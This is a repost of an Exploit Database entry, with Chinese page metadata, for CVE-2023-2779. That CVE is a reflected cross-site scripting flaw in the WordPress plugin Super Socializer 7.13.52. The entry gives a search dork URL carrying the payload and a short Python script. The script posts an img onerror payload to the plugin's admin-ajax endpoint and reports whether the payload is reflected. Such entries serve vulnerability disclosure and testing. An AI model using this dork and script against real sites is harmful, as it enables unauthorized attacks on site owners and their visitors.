Super Socializer 7.13.52 – Reflected XSS

• Exploit Database
• 21 阅读

• 作者： Amirhossein Bahramizadeh
  日期： 2023-06-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51534/

• # Exploit Title: Super Socializer 7.13.52 - Reflected XSS
  # Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com
  # Date: 2023-06-20
  # Exploit Author: Amirhossein Bahramizadeh
  # Category : Webapps
  # Vendor Homepage: https://wordpress.org/plugins/super-socializer
  # Version: 7.13.52 (REQUIRED)
  # Tested on: Windows/Linux
  # CVE : CVE-2023-2779
  import requests
  
  # The URL of the vulnerable AJAX endpoint
  url = "https://example.com/wp-admin/admin-ajax.php"
  
  # The vulnerable parameter that is not properly sanitized and escaped
  vulnerable_param = "<img src=x onerror=alert(document.domain)>"
  
  # The payload that exploits the vulnerability
  payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}
  
  # Send a POST request to the vulnerable endpoint with the payload
  response = requests.post(url, data=payload)
  
  # Check if the payload was executed by searching for the injected script tag
  if "<img src=x onerror=alert(document.domain)>" in response.text:
  print("Vulnerability successfully exploited")
  else:
  print("Vulnerability not exploitable")